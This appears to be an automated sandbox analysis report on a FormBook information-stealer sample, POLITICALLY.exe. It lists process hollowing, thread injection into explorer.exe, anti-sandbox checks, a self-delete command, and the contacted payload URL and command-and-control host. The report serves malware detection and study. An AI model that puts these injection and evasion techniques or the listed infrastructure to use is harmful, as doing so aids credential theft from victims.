Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h] 23_2_04833D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EE539 mov eax, dword ptr fs:[00000030h] 23_2_048EE539
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8D34 mov eax, dword ptr fs:[00000030h] 23_2_048F8D34
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048AA537 mov eax, dword ptr fs:[00000030h] 23_2_048AA537
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h] 23_2_04854D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h] 23_2_04854D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h] 23_2_04854D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04863D43 mov eax, dword ptr fs:[00000030h] 23_2_04863D43
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A3540 mov eax, dword ptr fs:[00000030h] 23_2_048A3540
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04847D50 mov eax, dword ptr fs:[00000030h] 23_2_04847D50
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h] 23_2_0484C577
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h] 23_2_0484C577
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BFE87 mov eax, dword ptr fs:[00000030h] 23_2_048BFE87
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 23_2_048F0EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 23_2_048F0EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h] 23_2_048F0EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A46A7 mov eax, dword ptr fs:[00000030h] 23_2_048A46A7
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04868EC7 mov eax, dword ptr fs:[00000030h] 23_2_04868EC7
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048536CC mov eax, dword ptr fs:[00000030h] 23_2_048536CC
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048DFEC0 mov eax, dword ptr fs:[00000030h] 23_2_048DFEC0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8ED6 mov eax, dword ptr fs:[00000030h] 23_2_048F8ED6
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048376E2 mov eax, dword ptr fs:[00000030h] 23_2_048376E2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048516E0 mov ecx, dword ptr fs:[00000030h] 23_2_048516E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h] 23_2_0482C600
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h] 23_2_0482C600
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h] 23_2_0482C600
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04858E00 mov eax, dword ptr fs:[00000030h] 23_2_04858E00
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1608 mov eax, dword ptr fs:[00000030h] 23_2_048E1608
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h] 23_2_0485A61C
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h] 23_2_0485A61C
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482E620 mov eax, dword ptr fs:[00000030h] 23_2_0482E620
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048DFE3F mov eax, dword ptr fs:[00000030h] 23_2_048DFE3F
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h] 23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h] 23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h] 23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h] 23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h] 23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h] 23_2_04837E41
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h] 23_2_048EAE44
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h] 23_2_048EAE44
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483766D mov eax, dword ptr fs:[00000030h] 23_2_0483766D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h] 23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h] 23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h] 23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h] 23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h] 23_2_0484AE73
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04838794 mov eax, dword ptr fs:[00000030h] 23_2_04838794
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h] 23_2_048A7794
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h] 23_2_048A7794
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h] 23_2_048A7794
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048637F5 mov eax, dword ptr fs:[00000030h] 23_2_048637F5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F070D mov eax, dword ptr fs:[00000030h] 23_2_048F070D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F070D mov eax, dword ptr fs:[00000030h] 23_2_048F070D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h] 23_2_0485A70E
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h] 23_2_0485A70E
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484F716 mov eax, dword ptr fs:[00000030h] 23_2_0484F716
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h] 23_2_048BFF10
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BFF10 mov eax, dword ptr fs:[00000030h] 23_2_048BFF10
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h] 23_2_04824F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04824F2E mov eax, dword ptr fs:[00000030h] 23_2_04824F2E
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485E730 mov eax, dword ptr fs:[00000030h] 23_2_0485E730
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483EF40 mov eax, dword ptr fs:[00000030h] 23_2_0483EF40
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483FF60 mov eax, dword ptr fs:[00000030h] 23_2_0483FF60
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F8F6A mov eax, dword ptr fs:[00000030h] 23_2_048F8F6A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829080 mov eax, dword ptr fs:[00000030h] 23_2_04829080
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h] 23_2_048A3884
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A3884 mov eax, dword ptr fs:[00000030h] 23_2_048A3884
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h] 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h] 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h] 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h] 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h] 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 mov eax, dword ptr fs:[00000030h] 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048690AF mov eax, dword ptr fs:[00000030h] 23_2_048690AF
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485F0BF mov ecx, dword ptr fs:[00000030h] 23_2_0485F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h] 23_2_0485F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485F0BF mov eax, dword ptr fs:[00000030h] 23_2_0485F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov ecx, dword ptr fs:[00000030h] 23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048BB8D0 mov eax, dword ptr fs:[00000030h] 23_2_048BB8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048258EC mov eax, dword ptr fs:[00000030h] 23_2_048258EC
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h] 23_2_048F4015
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F4015 mov eax, dword ptr fs:[00000030h] 23_2_048F4015
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h] 23_2_048A7016
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h] 23_2_048A7016
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A7016 mov eax, dword ptr fs:[00000030h] 23_2_048A7016
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h] 23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h] 23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h] 23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h] 23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485002D mov eax, dword ptr fs:[00000030h] 23_2_0485002D
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h] 23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h] 23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h] 23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B02A mov eax, dword ptr fs:[00000030h] 23_2_0483B02A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04840050 mov eax, dword ptr fs:[00000030h] 23_2_04840050
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04840050 mov eax, dword ptr fs:[00000030h] 23_2_04840050
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F1074 mov eax, dword ptr fs:[00000030h] 23_2_048F1074
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E2073 mov eax, dword ptr fs:[00000030h] 23_2_048E2073
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485A185 mov eax, dword ptr fs:[00000030h] 23_2_0485A185
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484C182 mov eax, dword ptr fs:[00000030h] 23_2_0484C182
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852990 mov eax, dword ptr fs:[00000030h] 23_2_04852990
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h] 23_2_048561A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048561A0 mov eax, dword ptr fs:[00000030h] 23_2_048561A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A69A6 mov eax, dword ptr fs:[00000030h] 23_2_048A69A6
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h] 23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h] 23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h] 23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048A51BE mov eax, dword ptr fs:[00000030h] 23_2_048A51BE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048B41E8 mov eax, dword ptr fs:[00000030h] 23_2_048B41E8
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0482B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0482B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0482B1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h] 23_2_04829100
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h] 23_2_04829100
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04829100 mov eax, dword ptr fs:[00000030h] 23_2_04829100
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h] 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h] 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h] 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov eax, dword ptr fs:[00000030h] 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 mov ecx, dword ptr fs:[00000030h] 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485513A mov eax, dword ptr fs:[00000030h] 23_2_0485513A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485513A mov eax, dword ptr fs:[00000030h] 23_2_0485513A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h] 23_2_0484B944
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0484B944 mov eax, dword ptr fs:[00000030h] 23_2_0484B944
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482C962 mov eax, dword ptr fs:[00000030h] 23_2_0482C962
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h] 23_2_0482B171
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482B171 mov eax, dword ptr fs:[00000030h] 23_2_0482B171
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h] 23_2_0485D294
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485D294 mov eax, dword ptr fs:[00000030h] 23_2_0485D294
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h] 23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h] 23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h] 23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h] 23_2_048252A5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048252A5 mov eax, dword ptr fs:[00000030h] 23_2_048252A5
Enables debug privileges
Source: C:\Users\user\Desktop\POLITICALLY.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3440 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\POLITICALLY.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 330000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\POLITICALLY.exe Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe' Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe' Jump to behavior
Source: explorer.exe, 00000013.00000000.521733147.0000000004F80000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000002.591577775.00000000008B8000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DC36 cpuid 2_2_0221DC36

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: POLITICALLY.exe PID: 6976, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5548, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 411376 Sample: POLITICALLY.exe Startdate: 11/05/2021 Architecture: WINDOWS Score: 100 28 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->28 30 Potential malicious icon found 2->30 32 Found malware configuration 2->32 34 7 other signatures 2->34 10 POLITICALLY.exe 2->10         started        process3 signatures4 42 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 10->42 44 Tries to detect Any.run 10->44 46 Tries to detect virtualization through RDTSC time measurements 10->46 48 Hides threads from debuggers 10->48 13 POLITICALLY.exe 6 10->13         started        process5 dnsIp6 26 111.90.149.46, 49744, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 13->26 50 Modifies the context of a thread in another process (thread injection) 13->50 52 Tries to detect Any.run 13->52 54 Maps a DLL or memory area into another process 13->54 56 3 other signatures 13->56 17 explorer.exe 13->17 injected signatures7 process8 process9 19 control.exe 17->19         started        signatures10 36 Modifies the context of a thread in another process (thread injection) 19->36 38 Maps a DLL or memory area into another process 19->38 40 Tries to detect virtualization through RDTSC time measurements 19->40 22 cmd.exe 1 19->22         started        process11 process12 24 conhost.exe 22->24         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
111.90.149.46
 unknown Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://111.90.149.46/bin_XNLhDlJvG218.bin true
  • Avira URL Cloud: safe
 unknown
www.nortier.cloud/olg8/ true
  • Avira URL Cloud: safe
 low